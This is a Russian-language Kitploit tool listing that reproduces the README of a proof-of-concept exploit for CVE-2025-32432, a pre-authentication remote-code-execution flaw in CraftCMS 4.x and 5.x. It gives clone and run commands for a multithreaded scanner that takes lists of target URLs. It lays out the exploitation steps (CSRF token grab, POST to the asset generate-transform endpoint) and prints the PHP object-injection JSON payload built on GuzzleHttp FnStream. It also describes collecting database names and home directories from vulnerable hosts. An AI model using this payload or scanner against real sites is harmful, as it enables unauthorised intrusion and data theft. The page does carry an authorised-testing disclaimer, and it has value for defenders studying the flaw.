Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32432 — Этот репозиторий содержит proof-of-concept скрипт эксплойта для CVE-2025-32432 — уязвимости удалённого выполнения кода (RCE) до аутентификации, затрагивающей CraftCMS версий 4.x и 5.x. Уязвимость находится в функции генерации трансформаций ресурсов CraftCMS. | Kitploit
Инструменты/GitHubGitHub/sachinart/cve-2025-32432
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubsachinart/cve-2025-32432

CVE-2025-32432

Этот репозиторий содержит proof-of-concept скрипт эксплойта для CVE-2025-32432 — уязвимости удалённого выполнения кода (RCE) до аутентификации, затрагивающей CraftCMS версий 4.x и 5.x. Уязвимость находится в функции генерации трансформаций ресурсов CraftCMS.

Репозиторий
27431 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CraftCMS CVE-2025-32432 от Chirag Artani

Обзор

Этот репозиторий содержит скрипт эксплойта для Proof-of-Concept (PoC) для CVE-2025-32432, уязвимости удаленного выполнения кода (RCE) до аутентификации, затрагивающей CraftCMS версий 4.x и 5.x. Уязвимость существует в функции генерации трансформаций ресурсов (asset transform generation) CraftCMS.

Этот скрипт эксплойта автоматизирует обнаружение и проверку уязвимости, выполняя:

  1. Извлечение CSRF-токенов из панели управления CraftCMS
  2. Эксплуатацию уязвимости через внедрение PHP-объектов
  3. Проверку успешной эксплуатации путем извлечения системной информации

Отказ от ответственности

⚠️ Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Используйте этот инструмент только против систем, на тестирование которых у вас есть явное разрешение. Несанкционированное тестирование систем без разрешения незаконно и неэтично.

Возможности

  • Поддержка сканирования как одиночной цели, так и нескольких целей (на основе файла)
  • Возможность многопоточности для более быстрого сканирования нескольких целей
  • Детальный вывод, включающий имя базы данных и информацию о домашнем каталоге
  • Генерация CSV-отчета для уязвимых целей
  • Обход проверки SSL для тестирования с самоподписанными сертификатами
  • Надежная обработка ошибок

Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Install required dependencies
pip install -r requirements.txt

Требования

  • Python 3.6+
  • Требуемые пакеты Python (см. requirements.txt):
    • requests
    • beautifulsoup4
    • urllib3

Использование

Одиночная цель

Для сканирования одной цели:

root@kitploit:~
python3 craftcms_rce.py -u example.com

Несколько целей

Для сканирования нескольких целей из файла (один URL на строку):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

Где -t указывает количество потоков (по умолчанию 5).

Опции

root@kitploit:~
-u, --url     Одиночный URL для тестирования
-f, --file    Файл, содержащий URL для тестирования (по одному на строку)
-t, --threads Количество потоков (по умолчанию: 5)
-h, --help    Показать справку и выйти

Вывод

Скрипт выведет результаты в консоль и сохранит уязвимые цели в vulnerable.txt в формате CSV со следующими столбцами:

  • URL
  • CRAFT_DB_DATABASE (имя базы данных)
  • HOME Directory (путь к домашнему каталогу)
  • Другая системная информация

Пример вывода в консоль:

root@kitploit:~
[*] Тестирование одиночной цели: https://example.com
[*] Запуск сканирования с 5 потоками
[+] УЯЗВИМ: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== СВОДКА СКАНИРОВАНИЯ ===
Всего просканировано URL: 1
Уязвимых сайтов: 1
Детальные результаты сохранены в vulnerable.txt

Как работает уязвимость

Эта уязвимость использует проблему десериализации в CraftCMS. Эксплойт:

  1. Выполняет GET-запрос к /index.php?p=admin/dashboard для получения CSRF-токена
  2. Отправляет POST-запрос к /index.php?p=admin/actions/assets/generate-transform со специально сформированной JSON-нагрузкой (payload)
  3. Нагрузка включает PHP-объект, который десериализуется, что приводит к произвольному выполнению кода через класс GuzzleHttp\Psr7\FnStream
  4. Успешная эксплуатация проверяется выполнением phpinfo() и извлечением определенной системной информации

Технические детали

Эксплойт использует небезопасную десериализацию в процессе генерации трансформаций ресурсов. Уязвимый путь кода позволяет злоумышленнику внедрить пользовательский PHP-объект, который десериализуется, что приводит к произвольному выполнению кода.

Ключевые компоненты нагрузки:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

Участие

Приветствуются вклады, сообщения об ошибках и запросы функций! Не стесняйтесь проверять страницу issues.

Лицензия

Этот проект лицензирован под лицензией MIT — подробности смотрите в файле LICENSE.

Ссылки

  • Детали CVE-2025-32432
  • Уведомление безопасности CraftCMS

Автор

  • Nicolas Bourras (Orange Cyberdefense) — Первоначальное обнаружение уязвимости
  • Chirag Artani — Автор скрипта эксплойта
Скачать инструмент